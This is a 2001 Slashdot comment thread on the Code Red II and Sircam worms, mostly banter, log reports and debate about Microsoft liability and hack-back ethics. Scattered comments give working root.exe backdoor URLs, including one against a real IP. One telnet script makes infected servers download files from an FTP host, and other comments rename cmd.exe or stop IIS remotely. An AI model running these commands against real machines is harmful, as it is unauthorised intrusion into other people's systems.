3.Take over the desktop -users and companies want just the opposite to linux a standardised and easily controlled and implemented system that is simple to use and secure and rollout - linux offers some of these things but not the important ones and is not user friendly to the home user level - its a great OS for servers and the enthusiast and i love it but it will never be everything to all people.
4. Change the world - its bits and bytes not gfeeding the poor - you do it to make money or get famous or whatever - get over it - this isnt uni anymore
The fact is this worm is a product designed by cowards to run a DDOS attack againt the white house (like that would fucking change anything) and then modified by other cowards to do pyhsical damage to servers and computers - its nothing more than a low act and no different to raping someone in my mind except it it the ultimate hands of coward act
'yeah this will fuck em' says Nicky the Nerd as he launches the malicious code 'i own em now - im so sexy'
what a wank - what a prick - you lot should be ashamed
Oh and call me a troll - if i posted this under my login BOOM some evangelist with a complex will hit me with a karma stick for having the balls to say something which doesnt agree with the sheep - i thought the whole point of slashdot was to make comments that are different from the norm
If you really want, I have a netcat capture of the worm, I could email it to you and you could infect yourself, just for shits and giggles. But note that the thing trojans your system, so you better have a good clean up procedure.
South Island, but no sorry, try the extreme sports capital of NZ ;) and no we don't get Mountain Dew here. We do however get Dr. Pepper imported from the States so go figure.
**AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
Three more versions surely..
LLLLLL...
IIIII....
and
UUUUUU...
What's that spell!!!
"Information wants to be paid"
I am also on nash1.tn.home.com and since around midnight on 8/6 I have logged around 178 access attempts. I noticed my data light flickering like crazy when I got on the system this morning. Oh well welcome to the Internet cicra 2001.
ummn, I think that in NT you have to change the number to hex meaning instead of 1 you'd use 0x1
I understand that this worm exploits the buffer overflow bug in IIS. Has anybody disassembled the program to understand how it operates. If so, please contact me...
I have determined that if we could insert a payload on a codeRed terminator, we could shut down the infested machine by calling the winAPI function:
This should work, assuming the process has SE_SHUTDOWN_NAME priveleges. I don't have IIS, but I am looking at MSDN on a Win2000 machine now.
I would like to understand the payload, it seems like a sequence of unsigned integers. They occur just past the stack, so when the function exits it returns to the inserted code. If we could insert the call to ExitWindowsEx() we would be HOME FREE!
Contact me @ michaeluman@softwaremagic.net
Michael A. Uman
Sr Software Engineer
softwaremagic.net
I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)
Except that the strange HTTP requests it puts out cause problems with some embedded webservers...
Bandwidth gets wasted when it's not utilized. I think you meant to say, "But imagine how much bandwidth Code Red and Sircam have 'utilized' in the last few weeks?"
even better... take it off the net if it gets a dhcp address:
/release
ipconfig
Isn't this a grand day, not a bad day? Just think, you now have 530 new shell accounts :) Imagine all the fun you could have.
- sourceforge.com was hacked
- themes.org was hacked
- apache.org was hacked
- the ramen worm
- the lion worm
- the knark rootkit
Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks".Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?
Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.
Mine too has my ADSL modem light up like a christmas tree. Even with my computers unplugged the adsl light keeps flickering. Is there any way to stop this?
Leftist: Force the world into slavery. Liberal: Vote the world into slavery. Libertarian: Let us alone!
You forgot one:
Capitalist: Sell the world into slavery.
Yabbut that's *still* not "all of us," as with SirCam.
Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.
Not that I'm complaining, mind you...
Slashdot's token middle-aged housewife
Magius_AR
It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!
Slashdot 's editors are dickheads
Time the long-awaited "Finger of God" script. Fdisk 'em!
Intelligent Life on Earth
You win the funniest post in thread award. Congratulations, and keep up the good work.
When will somebody modify the worm, so it downloads and install the patch.. then searches for other valnuerabel victims and infect them... ;)
/Geggibus "Ehh..."
I haven't decided whether to start with the tongue-lashing and threats for wasting my time, then to get their attention with the personal details, or to start with the personal details, just to get the freakout reaction.
Hopefully the luser will be too scared to ever start up a Microsoft program ever again.
(Alas, no credit card numbers yet, then I could just pay myself for the time spent on this... :-) )
Some studies indicate that plants feel pain when you cut them. What's next?
'Freedom for Mushrooms'?
All you cruel plant eaters should stop the hurt and pain NOW!
I've been watching my apache logs grow with requests for default.ida?blahblahblah and I had a weird thought last night. CR most likey has some bugs in it. How hard would it be to dissect a copy, find an exploitable buffer overflow, and write a CGI script that counter-attacks CR? I don't think it would be any harder than finding the original default.ida overflow. Or, if it really is making a shell available, why not just have the anti-worm log in and nuke CR?
I like to play children's songs in minor keys.
"We're all sons of bitches now." --J. Robert Oppenheimer
(Copied from the other thread, for those who are working on a way to fix this worm)
/pub/cr
/scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
/scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
:)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
--
What worries me is if this is just the beginning in a wave of attacks.
As everyone notices is that it is being directed against the following:
Microsoft users using e-mail.
Microsoft servers on the Internet.
Sircam is annoying to say the least as that attacks lack of security on the Windows platform and the lack of knowledge of plenty of Windows users.
Code Red mk1 and mk2 attack the lack of security on IIS (patch is available, MS patches known to cause other issues, we hear it) and then spread like wildfire.
StarTux
PS Microsoft is not very proffesional in its conduct IMHO. Its not all about money and power, its about providing the best possible software/service for your customers...
sounds great, but the problem is you would get in so much trouble for that.
-- Powered By Linux
I've always wanted to be able to telnet into my Windows box. Where can i get this virus?
--
Mod up a post Rob doesn't like and you'll never mod again
My employer, a reasonably computer proficient person, got hit by sircam. Cost him 16 hours of productivity during a period when time was particularly valuable...
Change your 'grep XXXXXXXXXXXXXXX' to 'grep default.ida' That way, you can get all the different variants. The 'X's are used by Code Red II, not the initial one.
SirCam spreads in an attached EXE
so would this be an elf binary? if not i doubt it will run on my computer.
-- john
Don't hold your breath. You think a post critisizing MS will get modded up? On slashdot? Yea right! The MS posse will soon mod it down.
War is necrophilia.
Note the dramatic upsurge a couple hours ago.
If they changed who provides them data, they might want to publish that fact, so one can assess the impact of that on comparisons over time.
If they didn't, well, perhaps they have a small enough number of contributing sites that a drastic change in attack rate at a single site (as is characteristic of CRII) drastically alters their numbers. Again, perhaps they should publish how many sites are contributing, and should note if any one site is providing anomalous data. (Obviously the anomalous data may turn out to be critical early warning, but it's useful to know if a sudden aggregate change is statistically likely to be attributable to a big change at a single site or two.)
If one or two reporting sites are NOT responsible for the upsurge, well, something seems to be afoot...
Just curious about the "highly caffinated soft-drink" popular among programmers that Code Red was named after. My first guess was Coca-Cola but someone also pointed out that it could be Red Bull. I'll stay with my original guess, due to the red cans and abundance of Coke wherever I see programmers. The only question is whether it qualifies as highly caffinated. On the other hand, Red Bull has its merit as well, being, well, "Red." However, I do debate whether or not Red Bull is highly popular, since its expensive as hell, and alot of the programmers I've met couldn't afford Red Bull on their non-existant saleries Anyway ... I'd be anxious to hear what insight the slashdot community can give on this matter.
*looks around table* ... i gotta throw away some of these coke cans ;)
damn that reminds me
**AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
What about cable and DSL users? Unless they have static IPs (rare in my part of the world), won't they be using DHCP?
Mind the Gap
Thanks for the advice, Mr. McTeer.
Try this:
http://www.slashdot.org/scritpts/cmd.exe
yeah, that's exactly what i was waiting for... cmd.exe and now I can deploy DDOS to any server i want - list of troopers (win boxes) ready to fuck anything i want are at my fingertips in my apache/access.log. excellent! I won't even blame chinese and M$ for eating my bandwidth...
it doesnt have to be iis, and it doesnt have to be taking control of something. on the other hand, are you willing to bet that it cant be done? how many "secure" ms products (or not even ms products) have flaws like this that appear every once in a while when somebody stumbles across it? too many. code red is achieved within the legal range of values in the protocols involved. without raw sockets, its usually just square pegs in square holes. with raw sockets, you can go into things that cant be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. its like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades. the car wont start, and the atm will reject the card. yes, raw sockets are available to *nix machines, and yes its in w2k, but these things arent widespread among regular people and outside businesses.
Are you pondering what I'm pondering?
I don't care what anyone says, cooking an
animal alive is just fucking sadistic.
I was trying to reach their help site, help.rr.com, and couldn't get through. Bright idea there, guys. proxy.mw.mediaone.net is running interference for now on port 8080, or I wouldn't even be able to reach Slashdot. :P
Ow! My eye! Which one? The one on the floor. ---Action Quake2 exchange, after catching 5 M4 rounds to the head.
Though this assumes that people actually realize they are running a server and look at their error logs. Most of the infected hosts I visited were a) foreign language, and b) the defualt install page.
well, what i'm thinking that you should actualy do is something like: /scripts/root.exe?/c+move+root.exe+c:\winnt\profil es\default\you_got_code_red_you_silly_bastard.exe
ipconfig /release will only work if they are using DHCP. You can do something like "ipconfig /release *" to release all adapters configured by DHCP, but how many of these machines are going to be set up that way? Not that many, I suspect.
Insufficient Internet Security
I noticed this the other night (5th Aug Oz time), when my youngun complained about net speed. Traceroutes to west coast USA from OZ showed that traffic inside Australia was OK, but big congestions stateside (3sec hops !) Inspection of apache logs showed a new variant of the worm in action, and it has not slowed down yet. Anyway, is there a repository somewhere where we can all upload lists of (confirmed) infected IP addresses ? a quick perl script pulls them out of the apache logs. Maybe someone can know up a service where we can post IP address lists, and have these accumulate into a monster IP list. Then make the IP list available for download. What you do with it after that is up to you. This is really good - hacking made easy, I imagine that there are a lot of newbies who can get started into real hacking because of this useful new feature introduced by Microsoft. This is probably the first (and only) thing that Bill Gates has done to dramatically improve the state of the art in Computer Science. The next generation of users should be better educated because of this. Thanks Bill !
Yeah, but Microsoft would just accuse us of creating viral software to attack their site. :-)
We're sorry, the phone number you have reached is imaginary. Please rotate your phone 90 degrees and try your call again
Another option might be to look for braggards on IRC and pin them that way. Not good odds though.
Ok I'm the guy. :) I had it removed for a while because I was freaking out how many people were dl my script. But it's back online for all to enjoy and probably make a whole lot better.
but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.
Why not redefine the protocol to where this is the correct and proper response to a codered type connection to port 80?
Some points of clarification for your highness:
Both worms, Code Red, and Code Red II were written by people with much better than monkey brains. They required skill in assembly language, and knowledge of windows and IIS internals.
Code Red II is nothing at all similar to Code Red. The only reason it is called code red II is because the binary contains the text "CodeRedII". The use of the same injection point (the ida exploit) is their only similarity.
Code Red II does not DDoS anything, as I said, CRII is completely different from CR.
One of the interesting side-effects of CodeRed that hasn't been discussed is this: anyone who wants to can now hack other machines with almost complete anonymity.
I've now got a huge list of IP addresses of badly administered machines with a known IIS backdoor. It's highly unlikely that anyone would notice my attempts to hack this machine over the background noise of CodeRed traffic flying around.
In a sense, CodeRed provides a smoke-screen for other hacking attempts, and a 'smoke-signal' to let hackers know where infected servers are.
There has been a major scientific break-in
After all, if they insist on running buggy software (IIS) and don't take the time to install security patches, this is negligent.
,
1. There is a duty to other internet users not to waste their resource (bandwidth);
2. There has been a breach of this duty (either running IIS or at least not installing patches); and
3. It has caused damage (used up my valuable bandwidth and log disk space).
I think we should all take each IIS server owner to small claims court and extract our few dollars of damages.
That way, it would make more economical sense to run Apache. The server owners will not have to pay for the software or the legal damages that would follow.
Sample Letter of Complaint
Your Name
Address
Date
(Name/Address)
Dear ________________
On (specify date), an attempt was made by your server to infect or otherwise incapacitate my server. As you are responsible for your server, you have a duty to maintain it and take reasonable steps to ensure that it does not cause damage to other computers on the internet. I assert that either by running fault software, or in the alternative failing to keep security patches installed according to the manufacturer's guidelines, you have breached this duty of care. As a result, your servers caused my administrators to spend unnecessary effort diagnosing bandwidth and security issues and wasted bandwidth belonging to me. I hereby demand the sum of $200 for administrator's time and wasted bandwidth.
Sincerely yours,
Signature
--Send certified mail, return receipt requested.
Most closed source software comes with the same disclaimer.
http:///c/inetpub/scripts/root.exe?/net%20stop%20' World%20Wide%20Web%20Publishing%20Service'
And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.
Enjoy
Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)
-Rob
"It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
Open-source is a little different. It comes with a disclaimer that they're not responsible for anything that goes wrong. When you receive something for free, you can't exactly expect to hold the author liable for any problems.
MS-ware OTOH costs a lot of money, and for that money, people should expect proper operation.
Perhaps software creators should be all held liable, based on the cost of their software: you can sue for 100 times what you paid, for instance.
I would expect the real waste of bandwidth to come not from the infection probes, but from the virus trying to send junk to target websites, such as the first Code Red did try to whitehouse.gov.
~
Tsunami -- You can't bring a good wave down!
Timothy 1:2
Hemos 1:3
Michael 1:4
Cowboyneal 1:100000000000000
ladies and gentlemen,
there is still time to place your bets...
Oh, and don't forget to tack a '| uniq' there :)
Under windows98 *dies* my firewall reports something like 50 http port probes per minute (avg). The IPs logged shows that all sorts of machines are probing (isp proxys, local machines (same subnet), distant machines from all over the world). I use Noos as isp (France).
This is a me too -- my firewall logs are filing up with DENY's on port 80, ever since last night.
Out of curiosity I've tried loading web pages from a number of the ip addresses in my logs and it seems that a lot of people on @home really hate us US government!
I have a great link on this topic:
1 9&mode=thread
http://slashdot.org/article.pl?sid=01/08/05/04332
only hits Outlook users, not every email user? Are telling me BeMail and Kmail are vulnerable. Ok, and Pegasus. ..
They cannot be infected, but they have to cope with the stream of files dumped on them by Sircam - getting several 100Kbytes daily here, worst hit was 11 Mbytes
only hits Outlook users, not every email user? Are telling me BeMail and Kmail are vulnerable. Ok, and Pegasus.
I too am with @Home and have been seeing large amounts of info flow into my cable modem. I am running a Masqueraded Linux box to connect my LAN to the Net - and it has been eating up all the packets - but I can't find a way to log them at all. I suspect that someone on my cable loop is probably infected with CodeRed and I am seeing all of the outgoing packets but I have no real way to tell. Does anyone know of a good way to save these packets from the bit-bucket so that we can find out who is sending them?? I really don't like the way my cable modem is flashing - it just bothers me.
http://66.25.153.130/scripts/root.exe?/c+dir+c:\
how much bandwidth has Windows wasted in the past few years...
Shift happens. Fire it up.
there are still alternatives out there, might as well get a copy before MS devours them too.
We need to push for a Lemon law for software. I think it is time folks. MS's license ensures one cannot hold them responsible for their imcompetance, or if you read I Cringley this week, their planned mediocracy.
photosMy Photostream
And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...
Sueing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.
No kidding. My cable modem data light blinks non-stop now. Fortunately, the router is blocking anything to port 80. But from the way data is pouring in, i would figure it to be several scans per minute to my cable modem.
the Sadmind/IIS unicode worm already did the copy-cmd.exe-to-the-scripts-directory thing. CodeRed uses the same vulnerability, just attaches a different payload than changing your index.html to "f--- usa!", etc.
/scripts/root.exe and using it to set up those lovely little DoS scripts...
Kiddies were already scanning around for
--
Benjamin Coates
some grepping and word counting revealed about 606 hits as of about 5:00 CDT last night. my first attack was at Aug 3 at 23:40 CDT. i dont think the activity light on my cable modem has stopped blinking yet. each computer attempts to get to infect three times before it gives up & moves on.
:) but my connection sucks now because of all the morons that didnt patch themselves up after the first time it went around.
what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support. (if you read GRC stuff then this is old news) script kiddies everywhere, and more attacks can be made that were previously impossible or at the least difficult to accomplish. yes its true that this started in w2k, but does everybody actually have w2k? nope. they're really gonna push XP though, unlike any of the upgrades past 95.
then again maybe everyone does have it, seeing how many attacks i'm getting. the most aggravating thing about this is that all of the attacks just bounce off me (proudly microsoft free
Are you pondering what I'm pondering?
Didn't say it was a good idea. I just said it could happen. I'm sure MS would love it, because it would destroy Linux.
I also have an @home acount with a Linux firewall. run iptraf and take a look at the arp request I am averaging hundreds a second. with the occasional port 80 hit. in the last hour or so I have logged about 50 hits to port 80.
:0 BD o8OkQ6SD
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6H
/dev/null
By design, it's a very bad idea to make your trojan/virus do anything too shocking.
Ever boiled a frog? If you throw a frog in hot water, it'll jump out. If you slowly turn up the heat, it'll roast.
This sort of violent behaviour in a virus stops it from being able to live with it's host, because it gets detected way too fast. A worm/virus/trojan that has too great a consequence on it's host will be wiped out too soon, and in the case of the worm, this means lesser propogation.
<\Devil's advocate>
Think about what CRII is going to do for the zero day lists!! Hey.. how about a gnutella hack that automatically accepts uploads and shares 'em right back out??
Intelligent Life on Earth
I'm surprised that there is still nothing on .
/e-mail/ virus). Wonder what the MS PR spin will be on then next one...
Last update on code red and sircam frenetically avoided to the word 'microsoft' (/internet/ worm,
....this one.
I have to live with it being on the biggest "script kiddie" network on earth (ATT Broadband). I'm getting approximately 3000 HTTP port probes against my machine an hour (without a webserver). If i reboot my windows machine, it takes me 30 minutes to get a DHCP address due to the fact that the DHCP server is hosed.
DoS attack against the Whitehouse? I don't think so, how about a DoS attack against everyone? I can't even get to servers in Italy.
Yes, my girlfriend is a BitchX
I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.
It's depressing, really.
-Rob
Or just plain simple?
\
Just type the following into a browser using one of the infected systems from your log file:
http://infected_system/scripts/root.exe?/c+dir+c:
You are greeted with a directory listing of the root of C:\!
I just LOVE windows!
This is going to get MUCH worse!
Forgive me for the karma whoring, but all I did was scroll down my SlashDot homepage to see that Timothy already posted an article about Code Red II.
Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syroupe, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which arent windows machines. I guess linux is like the caffeine of all soda. The good parts :-)
"If a man watches 3 football games in a row he should be declared leagaly dead" - A
isomerica.net | Foonetic IRC
now are either workstations with IIS installed and the user doesn't know/remember
A friend of mine is a cable modem user who got infected. He said on or about the 1st, his cable modem light suddenly became maxed out. He's usually good with his system administration, but he recently switched back from RH to Win2k server. He checked and checked and found out that some Windows Media Server had been installed and was running its own copy of IIS, which had been infected.
The next day he installed Apache Win32.
Intelligent Life on Earth
I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.
:-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.
What will happen? I don't know, but here are some possibilities:
Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.
Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.
Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.
Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley
So, which will it be, folks? This would make a great SlashPoll.
please. posting another story like this is almost as big a waste of bandwidth as the worm.
1 9.
please reference previous stories: http://slashdot.org/article.pl?sid=01/08/05/04332
I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?
:)
I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or server with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?
Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that?
heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.
Geeky modern art T-shirts
To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310
..that code red I wasnt written along the lines of code red II. There would be alot more unpatched websites out there with super user wide open.. I think this hints that code red I and code red II are written by different people.
Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?
I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.
If not, why not?
I still think sircam is more annoying since it affects every email user
Every email user?!? CmdrTaco must run Windows. Let's get him!
This script kiddie won't stop until he gets all over the news about the damage it caused.
Another 13 year old looking for attention.
until (succeed) try { again(); }
They got lucky when the hacker messed up (he used a hard IP instead of domain name). What did they do in response?
What did the whitehouse.gov admins do once they realized that they were a clear target? Write angry but useless letters to microsoft? Call Bill Gates and piss and moan?
NO! they took a PRO-ACTIVE reaction to a threat of clear and eminent danger to information distribution and installed Linux.
www.whitehouse.gov is there a lesson there?
First came NNNNNNN then XXXXX... Hmmmmm. I predict two more versions : IIIIIII and UUUUUUU.. It's a word scramble game!
Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.
The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.
Hmm . . .
Because those who are most vulnerable to the wormvirus are the companies with the most clueless sysadmins, the set of machines with uninstalled service packs (and running Index Server by out-of-the-box default, the vulnerable component) probably largely overlaps the set of Code Red machines.
Yes, having to administer one of these along with Solaris and Linux boxen, I've patched mine; trivial).
I tried pulling up a few IP's logged in my apache logs and this is what I got for most of them: The page cannot be displayed There are too many people accessing the Web site at this time. HTTP 403.9 - Access Forbidden: Too many users are connected Internet Information Services Technical Information (for support personnel) Background: This error can occur if the Web server is busy and cannot process your request due to heavy traffic. 90% of them are unsecured computers on the @home 24.x.x.x network.
It's not if as many /.ers need to be told about the existence of the DEL command, and the intellectual leap required to recognize that the ability to execute an arbitrary command implies the ability to execute a particular command seems rather modest to me.
But before we mod this down as an insult to the intelligence of the /. readership, there is a more interesting issue: This particular inspiration is going to occur to a fair number of vandals, kiddies, and assorted undersocialized individuls. Many of them will do something more destructive with it than posting it to slashdot. More generally, the level of sophistication needed to attack a CRII-compromised machine is low, much lower than even script-kiddie level, low enough that any moderately determined wolfcub with a bent hairpin and a telnet client can do tremendous damage.
Thus, CRII has suddenly created and widely advertised a pool of very vulnerable machines. It would not be surprising to find that the worst damage is done by vandals following along behind CRII, just as looters follow behind natural disasters.
If you take the water away completely and hold the frog over the heat sorce itself it will roast.
Sorry, I'm "in a mood" today and I couldn't help myself.
Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*
What is the relevance and why should anyone care? Lobster.
The correct way to cook a lobster, not matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.
If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.
Starting in cold water is both more humane and results in quite noticably tastier lobster.
KFG
http://infected_machine/scripts/root.exe?/c+ren+cm d.exe+worm.exe
I've been told trying to delete cmd.exe gives access denied - maybe its attrib +r+s or something. This one works for sure
My server
Someone on the 24.x.x.x domain (@home) is ineffected bad with this thing I'm not even running a server. I'm just surfing to day, Zone alarm is going crazy reporting attacks to different ports. What gives I thought this was a port 80 thing?
This is a Sig, there are many like it but this one is mine! I wish I had more than 120 chars... whats a char?
According to some of the posts I've been seeing a lot of the infected machines are on cable-modem users. Due to the nature of this new beast we have access to all these infected servers. Cable-modem users due to their high bandwidth tend to have some of the best downloadz. It sounds to me like this is just Napster Version 2.
Dozings.com -- Its kinda funny... If you're as crazy as me.
OR, one group could patch all those infected hosts...or at least notify the admins.
I've got a full analysis of this at http://braddock.com/cr2.html
This happened to me on 7/23/01, so I don't know how new it really is. Now time to format that damn win2k box :-(
rooooar
...to shut down these systems now?
Think about, folks - I'm no script kiddie, but using information posted on /. under this article, I grabbed the URL of an infected system and using my Internet Explorer (on Win95 no less) was able to do a DIR C:\ on aforementioned system (following the instructions in a posting here on /.).
Surely that means that Slashdot is contributing to the problem by making all the necessary information available where any script kiddie can find it.
Now that we've made that information available, surely we have a responsibilty to at the least remotely shut down the systems so that they aren't at further risk until the owners see them tomorrow morning?
Now of course, that may be still considered 'hacking' so is there a suitable government or non-government organization which could legally do this?
...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."
--------
Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...
What really needs to be done is setup a software protective services agency, similar to child protective services. If the parent (company) is caught abusing (repeated instances of lack of security, total lack of concern for the end users of the software, etc) the child, the child (software with source code) is taken from them and placed with foster parents (another company) that have the child's (software's) best interests in mind.
I see the first children being Outlook and IIS.
Extra credit: Disinfect the machine with the security patch from the MS Web Site.
As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Start using the root.exe to leave files on their hard drives. I left one one some poor admin's desktop, "youwerehitbyCodeRedII,pleasereformatandpatchyouse ver"
Ah... I was too lazy to add spaces. Hopefully it would be enough to scare them -- the unfortunate souls don't know their servers are broadcasting that they have a backdoor...
I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:
/var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b"); /dev/null");
#!/usr/bin/perl
while(1) {
system("cat
$returnval = system("diff attacks_a attacks_b >
if(0!=$returnval) {
system("cp -f attacks_b attacks_a");
system("play buzzer2.aiff &");
}
sleep(1);
}
char sig[120] = "\0"
I've read most of the discussion on this over today and my net connection is pretty much fux0red thanks to folks on my ISP who don't patch their s/w. I agree writing a virus to propogate and patch the holes in IIS servers is a great idea, but there's always the chance you'll get a slap on the wrists for that - and is anyone willing to risk it?
r g/codered.html
:)" and includes a link to Symantecs site on Code Red C (complete with patch) - oh, and a link to mine because it gets 0 hits and I figure if this works it's a good way to get traffic :)
:) I guess I'll find out next time one of the buggers attacks my machine.
:)
What I've done instead is set up a mime type for ida files to be handled as PHP, written a pretty simple default.ida that basically refreshes to http://$REMOTE_ADDR?/c+iexplore+http://www.jado.o
http://www.jado.org/codered.html being a little file that says "Hi, you've got Code Red dumbass, fix your PC cos it attacked mine
Whether or not Code Red is stupid enough to attack the box, wait for a response, then let itself get redirected to another site is another matter - so will it work? I dunno
I'm guessing what I've done (assuming it even has an effect) is legal? At worst grey-area stuff (since my machine is just responding to a request from thiers).
Oh, and it's late and I'm tired - English is my first language but I'm almost asleep writing this, sorry if it's a bit discombobulated
--
Jado.
The loneliest site on the net
From the article:
The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."
It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.
Let me make sure I understand this one.
/var/log/apache/access.log
/var/log/apache/access.log | mawk '{print($1) }'
I grep \?XXX from
grep \?XXX
Then, for each result, I can telnet to port 80 and remote root the machine with a single get request for scripts/cmd.exe ??
I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.
